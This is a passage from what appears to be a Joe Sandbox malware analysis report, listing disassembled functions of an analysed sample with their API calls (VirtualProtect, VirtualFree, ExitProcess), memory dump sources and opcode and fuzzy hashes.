                                                                          • Instruction ID: bf0c80d92d13493b49e9dcb7bcdc4e47556da43b6527a4499be052ab0d43f18f
                                                                          • Opcode Fuzzy Hash: 4285c11582544c208a3b82fa451c2a1a10148e029c16aba5f1fa2e7e2fdf8d0f
                                                                          • Instruction Fuzzy Hash: CC21C5B2D045595BEB208614CC80BEFB778ABD5305F1481FAD90D62601D27DAFC5CF95
                                                                          Function 004A4A26 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 87cf8f2b6445bb8dbdcee3e402e497b0268500d5fada6863b1d194f0b8aeca38
                                                                          • Instruction ID: 99a38a775e38730e8d1ad037c2947798a05b68f45980e61cb0ac8f1b80784597
                                                                          • Opcode Fuzzy Hash: 87cf8f2b6445bb8dbdcee3e402e497b0268500d5fada6863b1d194f0b8aeca38
                                                                          • Instruction Fuzzy Hash: D121F3B2D041599BEB208A10CC90AFFB775BBD2315F1481EAD40996640D63D6FC2CF55
                                                                          Function 00899AB0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0009b087f1bd571c65ba7aa7d4a46231d97c52ff102b5cd711743c6740e11169
                                                                          • Instruction ID: b4ad18ce42cd203144dd023fab50f40935a92b1f3baea80c3e68ddd2266cd237
                                                                          • Opcode Fuzzy Hash: 0009b087f1bd571c65ba7aa7d4a46231d97c52ff102b5cd711743c6740e11169
                                                                          • Instruction Fuzzy Hash: CE112BE2C08008AAFB195914DC5ABFB362CF75131CF2D01BEE60FD4580E26C9AC44593
                                                                          Function 004A4A2C Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 17d958134a33974817e57ff967fca1c5cd80d226f55ab61c0b8a80a800bd18a2
                                                                          • Instruction ID: efef85518f210547cfe66a3408a1d6de6bba9c18fc94a42e1df19e3cc524defe
                                                                          • Opcode Fuzzy Hash: 17d958134a33974817e57ff967fca1c5cd80d226f55ab61c0b8a80a800bd18a2
                                                                          • Instruction Fuzzy Hash: E221C0B2D045599BEB208A14CC90AFEB775BBD1305F1481EAD44966240D63DAFC2CF55
                                                                          Function 004A475A Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0ae0f1211eb841f129cc93cdad52504ad0adbede00bb3a7d285b66944de10c0e
                                                                          • Instruction ID: ebecdc676cc3c60da1da2dafec13a8599d467f241872a274ca96d61fd8c50ce0
                                                                          • Opcode Fuzzy Hash: 0ae0f1211eb841f129cc93cdad52504ad0adbede00bb3a7d285b66944de10c0e
                                                                          • Instruction Fuzzy Hash: AA11E1B2C042599BE7208A10CC80BEAB778EBC1301F1441FAE50DA6240E67DAFC18E54
                                                                          Function 008848BD Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: dba754fdcb5f35b31817c2f284e7806ec09503c9d23636e63740f316a69e9cf6
                                                                          • Instruction ID: ad7e2591f84770a908f6c84e6a72077748dfc8683f546dc72c124136af836622
                                                                          • Opcode Fuzzy Hash: dba754fdcb5f35b31817c2f284e7806ec09503c9d23636e63740f316a69e9cf6
                                                                          • Instruction Fuzzy Hash: 8B1103B2D0422A9FDB249B14CC94BFA7B79FB41348F0000EDE549A6241D3755A85CF52
                                                                          Function 00899AC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ea091078bba09fee2f1641468ce30893b457e7537053932ed519e721236b9737
                                                                          • Instruction ID: c2341247ced3165f782b9002a6d0f994b25f6e1230fb2ae2e508cee74775aeb0
                                                                          • Opcode Fuzzy Hash: ea091078bba09fee2f1641468ce30893b457e7537053932ed519e721236b9737
                                                                          • Instruction Fuzzy Hash: 8701F5E2D08008AAFB285914EC59BFB762CF750318F1D41BEE60FD4980E37DAAC44592
                                                                          Function 00899EF9 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 4483d4cc98469e398b6613901700d8144dc2a276c607b2f5bb805b8dee6b56d5
                                                                          • Instruction ID: f4370f29ad3f56127186d8c20b821467f802812f1becd4ebf8b7509c0f5b9f3a
                                                                          • Opcode Fuzzy Hash: 4483d4cc98469e398b6613901700d8144dc2a276c607b2f5bb805b8dee6b56d5
                                                                          • Instruction Fuzzy Hash: 3901F5E2D08008AAFB285914DC59BFB762CF790318F1941BEE60FD4980E7BCAAC44596
                                                                          Function 004A4767 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c59a013c91f8183b96167cdcb3b7e1a8f594469a62ee4820a6be7682e4567365
                                                                          • Instruction ID: 1a657edb42bb7a73d4958d1dc944c9cb77d41bf2573cd1328c23784817f9e10a
                                                                          • Opcode Fuzzy Hash: c59a013c91f8183b96167cdcb3b7e1a8f594469a62ee4820a6be7682e4567365
                                                                          • Instruction Fuzzy Hash: 0611BBB2D046599BEB208A10CC90BEABB78FBC1301F1445F9E50DA6240E63DAFC18F50
                                                                          Function 00867F31 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 172511ce791fdba9fb2f5b8503183f16af75c962dcf52fbbec927ad774b6621d
                                                                          • Instruction ID: 25bb6c673606684c125f4e7c72c549cac6ca737160c752bdc5d2375ff643de5b
                                                                          • Opcode Fuzzy Hash: 172511ce791fdba9fb2f5b8503183f16af75c962dcf52fbbec927ad774b6621d
                                                                          • Instruction Fuzzy Hash: B6012DF3D04018EBF7144514EC1DBFB7678FB54314F1A42BDE60E95580EA795B844692
                                                                          Function 004BBD7A Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(00000000), ref: 004BC4F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 7de6f33671f6dd266b399756a0cfe168be7a71f2f6f5bad4024b51dc7e5fbb97
                                                                          • Instruction ID: 0f17c06895c86db1ebce21f6ff39f89fe6e9bd3deacf86ec9d4c650f1cefed74
                                                                          • Opcode Fuzzy Hash: 7de6f33671f6dd266b399756a0cfe168be7a71f2f6f5bad4024b51dc7e5fbb97
                                                                          • Instruction Fuzzy Hash: 920126F7D040145BF7214621EC49BEB7A2DDB91312F1881BBD94E11241D67D4EC648A2
                                                                          Function 004A439B Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: aa1d9f3d590bd21070555fa3928876742c4a5fed532e341801f8a57d80d630cc
                                                                          • Instruction ID: 4b3c5f327143d516572332687e3878b3db1396b9a84e28386d6e9446aea9f118
                                                                          • Opcode Fuzzy Hash: aa1d9f3d590bd21070555fa3928876742c4a5fed532e341801f8a57d80d630cc
                                                                          • Instruction Fuzzy Hash: 590124F2D042846BE7208614DC80EEBAB68AB81301F1880B9E50D96600D17DAFC28B21
                                                                          Function 008844FD Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 794ff5960fb932a92d8f26f0776d8166e96b08f4c97e4538d2dedea8b21b47ce
                                                                          • Instruction ID: f2a4f598e8570b03a87ef3a90f94c3e08bacbf2c4001061328e29d95db0aa823
                                                                          • Opcode Fuzzy Hash: 794ff5960fb932a92d8f26f0776d8166e96b08f4c97e4538d2dedea8b21b47ce
                                                                          • Instruction Fuzzy Hash: CE012BB390512A9EE7209A54CC94AF67B7EFB01348F0410FDE54D96181D2B50AC9CB52
                                                                          Function 0088450A Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 853d5086cc0d6ff7984784c3341579e7460f9103d047b8cb0091ebaeed7ef3c4
                                                                          • Instruction ID: 56ed307c7852d4b96802e11b51e1ff908971a344f6da0d863747ed10bc5a9d10
                                                                          • Opcode Fuzzy Hash: 853d5086cc0d6ff7984784c3341579e7460f9103d047b8cb0091ebaeed7ef3c4
                                                                          • Instruction Fuzzy Hash: 850149B290512A5FE7209614CC94BF67B7EFB01348F0410FDE64E95080D2B50EC9CB52
                                                                          Function 008840CC Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 9a4ea65ae067c4c37b0b17a1551a1c19370767de541783c7612c3f7b345419af
                                                                          • Instruction ID: 259592c5699fbefbcc9b8cbaf6035a6b728bf56a6b168a6db775849aee582a9a
                                                                          • Opcode Fuzzy Hash: 9a4ea65ae067c4c37b0b17a1551a1c19370767de541783c7612c3f7b345419af
                                                                          • Instruction Fuzzy Hash: 5101F9B2A0551E5EE7245614CC94BF6777EFB4134CF1410FDE509D5181D2B50AC9DB11
                                                                          Function 008840D3 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ed905d81eaf58823562682a28d1fc0258bf866796733f08a7d9fac30434bd0a9
                                                                          • Instruction ID: a308508f2fc178567b79863a9f091c130dc02d1798aca56ea9e8f3f1f5cf2f36
                                                                          • Opcode Fuzzy Hash: ed905d81eaf58823562682a28d1fc0258bf866796733f08a7d9fac30434bd0a9
                                                                          • Instruction Fuzzy Hash: 2FF078B2A0512E4FE7209610CCA4AF6B77EFB0134CF0411FEE60ED1080D2B10AC9CB12
                                                                          Function 00884BDC Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0d3bffb1165dc19f787a36410854203e946b0d262c763a3842c23ea43423d6e7
                                                                          • Instruction ID: 31eb5b2cf76d64c55ab8afa567ff8cad6d0ec611833357ffc6ad86616a678f87
                                                                          • Opcode Fuzzy Hash: 0d3bffb1165dc19f787a36410854203e946b0d262c763a3842c23ea43423d6e7
                                                                          • Instruction Fuzzy Hash: 1701D8B2E0526A5FD7259B14CCA4AF9B779EB41348F0440FDE90D96181E2B55E84CF11
                                                                          Function 00884980 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c16abb622fd95a63e41ed4186be3553e6377a10bab60144d627fb1f87377fc87
                                                                          • Instruction ID: 521ff42f8bed18e3872b879245f65e9eade49bee08a8e9334bce828dbf005d7d
                                                                          • Opcode Fuzzy Hash: c16abb622fd95a63e41ed4186be3553e6377a10bab60144d627fb1f87377fc87
                                                                          • Instruction Fuzzy Hash: 6401DBB2E0522A5FD7249B14CC94AF5B77EFB41348F0440FDE50D96181D2755E88CF11
                                                                          Function 00884929 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: a9beed8d3c4a441edae6603ec028015d3d311e96f06ef2802bdb8729ae892da4
                                                                          • Instruction ID: b7bb5f297e122ec829e9639f3173ed21f3e724b88d75f4a1dbb4c3d3e53067c3
                                                                          • Opcode Fuzzy Hash: a9beed8d3c4a441edae6603ec028015d3d311e96f06ef2802bdb8729ae892da4
                                                                          • Instruction Fuzzy Hash: 5501A7B2E0522A5FD7249B14CC94AF5B779FB01348F0440EDE50D96141D2755E88CF11
                                                                          Function 0088495B Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 3d971d83c34d12c132240d5d8596037cdc376e3f9a64c9548b47e96918ef87b3
                                                                          • Instruction ID: 6f5e369c9cd4048eef788f89465878d6d7ce3eb81e011df46b0ff7f653da6d0c
                                                                          • Opcode Fuzzy Hash: 3d971d83c34d12c132240d5d8596037cdc376e3f9a64c9548b47e96918ef87b3
                                                                          • Instruction Fuzzy Hash: 1101DBB2E0522A5FD7249B14CC94AF6B77EFB41348F1440FDE50D96141D2755E89CF11
                                                                          Function 0082EC31 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFF8C8), ref: 0082EC58
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 12a67f0f6343b83114caaf3d2e5c313aea1ecf59126c103562546b29efcd4bd3
                                                                          • Instruction ID: f2105ff97a0a7090aa6d8ebda6433bcabe8ed4dac39760a5d70fcfc1cdce3dde
                                                                          • Opcode Fuzzy Hash: 12a67f0f6343b83114caaf3d2e5c313aea1ecf59126c103562546b29efcd4bd3
                                                                          • Instruction Fuzzy Hash: 02F027B18042699FD7249AB89C05BEA7778FF54300F0088DAD18AEB140E5314EC1CFA6
                                                                          Function 00884C2D Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c0e2f3fdcfca1205651f7c1a705edf6d4c734da959f62b69ee66d54c60168e6d
                                                                          • Instruction ID: 681e97058a6755c2b549492a24dcc9e9149f8dd9b7d56cf75b16b9c4fea22960
                                                                          • Opcode Fuzzy Hash: c0e2f3fdcfca1205651f7c1a705edf6d4c734da959f62b69ee66d54c60168e6d
                                                                          • Instruction Fuzzy Hash: 6BF027B2A0826A0FDB209B64CCC4DE67B7DEF41348F4401FCE50896142D2B64EC9CB11
                                                                          Function 004BB989 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(00000000), ref: 004BC4F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 2e162f9ff93f1dea0ef2aa722dcb9aab45ed833de93f232e2c540d0029b51d83
                                                                          • Instruction ID: 8a113db418cee25690c893ee89c9e706ff3a12e27d5c7f9868624e5c92ecc910
                                                                          • Opcode Fuzzy Hash: 2e162f9ff93f1dea0ef2aa722dcb9aab45ed833de93f232e2c540d0029b51d83
                                                                          • Instruction Fuzzy Hash: 88D012B145465695F3648560ECD67EB7524E700302F10C471D94ED4180C66C59D15D12
                                                                          Function 008353ED Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 5fb5e540d0f623987c6f08387c3b8226c8a6516c8459a262a897807153963b2a
                                                                          • Instruction ID: 69972bf90a15c58daed4bde1f5d977a1d022b0afdbd41240ed0260cb7d3e674d
                                                                          • Opcode Fuzzy Hash: 5fb5e540d0f623987c6f08387c3b8226c8a6516c8459a262a897807153963b2a
                                                                          • Instruction Fuzzy Hash: 8D71F3B4E056288FDB24CF14CC94BA9B7B1FB99315F2481D9D849AB241D778AEC1CF81
                                                                          Function 008355B3 Relevance: 1.4, APIs: 1, Instructions: 112COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 020947ccbdb28eb617e6e248aef44207cbda2eaea5ef03a792c75e2bd99c66a7
                                                                          • Instruction ID: 8ba24827e72aa5d89af8083f4dd4024aca3141bbe0dc10c1762ca390e0aa5533
                                                                          • Opcode Fuzzy Hash: 020947ccbdb28eb617e6e248aef44207cbda2eaea5ef03a792c75e2bd99c66a7
                                                                          • Instruction Fuzzy Hash: C941B170E05A688BDB24CB64CC90BAE77B5FF85301F2881E9D409A7641D2789E81CF41
                                                                          Function 00834ADB Relevance: 1.3, APIs: 1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: f67703f65752f9bb783298760f3026c310286a0fbd9c9b3517f2bd8a1bd19493
                                                                          • Instruction ID: 0748f08c88b1012081b5a0d40642daa05e79213c031707e9085de05d22375fb9
                                                                          • Opcode Fuzzy Hash: f67703f65752f9bb783298760f3026c310286a0fbd9c9b3517f2bd8a1bd19493
                                                                          • Instruction Fuzzy Hash: 293107B2E01318EBEB348A64CC48BAA7779FBC5320F1541F9E50DA6180D678AFC08F51
                                                                          Function 0083493D Relevance: 1.3, APIs: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 176750312afaae23806e1988fd470622d92610e87a273ca0f7331d5e9f27b7e5
                                                                          • Instruction ID: 089be1fa7c9e9d452250d698eeea512378a077259ea5a200adb490d117c97809
                                                                          • Opcode Fuzzy Hash: 176750312afaae23806e1988fd470622d92610e87a273ca0f7331d5e9f27b7e5
                                                                          • Instruction Fuzzy Hash: 8021AEB2E01258ABFB608A64DC48FAA7779FBC5720F1440A9A50DA6180D6799EC18F51
                                                                          Function 008348EB Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
